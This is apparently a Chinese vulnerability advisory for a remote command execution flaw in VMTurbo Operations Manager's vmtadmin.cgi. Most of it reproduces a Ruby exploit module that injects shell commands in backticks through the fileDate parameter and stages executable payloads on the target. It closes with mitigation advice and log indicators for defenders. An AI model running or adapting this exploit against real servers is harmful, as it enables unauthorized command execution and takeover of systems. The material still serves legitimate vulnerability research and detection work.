VMTurbo Operations Manager 'cgi-bin/vmtadmin.cgi' 远程命令执行漏洞(2)

vprint_status("#{peer} - VMTurbo Operations Manager version #{version} build #{build} detected")
    else
      vprint_status("#{peer} - Unexpected vmtadmin.cgi response")
      return Exploit::CheckCode::Unknown
    end

if version and version <= "4.6" and build < "28657"
      return Exploit::CheckCode::Appears
    else
      return Exploit::CheckCode::Safe
    end
  end

# Sends a single GET request to /cgi-bin/vmtadmin.cgi with +cmd+ embedded in
# the fileDate query parameter, wrapped in double quotes and backticks.
#
# For log review: the request carries callType=DOWN, actionType=CFGBACKUP and
# a fileDate value that contains backtick characters.
#
# @param cmd [String] text placed between the backticks of fileDate
# @param opts [Hash] accepted for the caller's sake; not read in this method
# @return [nil] when the connection is refused, unreachable or times out;
#   otherwise whatever vprint_status returns (the HTTP response is discarded)
def execute_command(cmd, opts)
  request = {
    'uri' => '/cgi-bin/vmtadmin.cgi',
    'method' => 'GET',
    'vars_get' => {
      "callType" => "DOWN",
      "actionType" => "CFGBACKUP",
      "fileDate" => "\"`#{cmd}`\""
    }
  }

  begin
    send_request_cgi(request)
  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
    # Only transport-level failures are reported; nothing is retried.
    vprint_error("#{peer} - Failed to connect to the web server")
    return nil
  end

  vprint_status("Sent command #{cmd}")
end

#
  # generate_payload_exe doesn't respect module's platform unless it's Windows, or the user
  # manually sets one. This method is a temp work-around.
  #
  # Stops the module with Failure::BadConfig when generate_payload_exe returns
  # nil; when it returns anything else this method does nothing.
  def check_generate_payload_exe
    return unless generate_payload_exe.nil?

    fail_with(Failure::BadConfig, "#{peer} - Failed to generate the ELF. Please manually set a payload.")
  end

# Module entry point. Two paths, selected by the target name:
#   * name matches /CMD/ - one call to execute_command with the encoded
#     payload; the outcome is not observable, hence the "blind" status line.
#   * anything else      - verifies an executable payload can be generated,
#     then hands off to the CmdStager mixin using the :printf flavor.
def exploit
  unless target.name =~ /CMD/
    check_generate_payload_exe

    # Handle payload upload using CmdStager mixin
    return execute_cmdstager({ :flavor => :printf })
  end

  # Handle single command shot
  sent = execute_command(payload.encoded, {})
  # A falsy return from execute_command is treated as a failed attempt.
  fail_with(Failure::Unknown, "#{peer} - Unable to execute payload") unless sent

  print_status("#{peer} - Blind Exploitation - unknown exploitation state")
  nil
end
 end

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
vmturbo
 -------
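 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本。需要注意的是,上文模块的 check 逻辑只把版本不高于 4.6 且 build 号低于 28657 的实例判定为可能受影响,其余一律判定为 Safe,这说明较新的 build 可能已包含修复,具体请以厂商公告为准。该判断使用的是字符串比较,对位数不同的版本号或 build 号可能得出错误结论,因此 Safe 结果不能作为已修复的依据。在完成升级之前,建议限制对 /cgi-bin/vmtadmin.cgi 的网络访问,并在 Web 日志中排查 callType=DOWN、actionType=CFGBACKUP 且 fileDate 参数含有反引号的 GET 请求。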
 
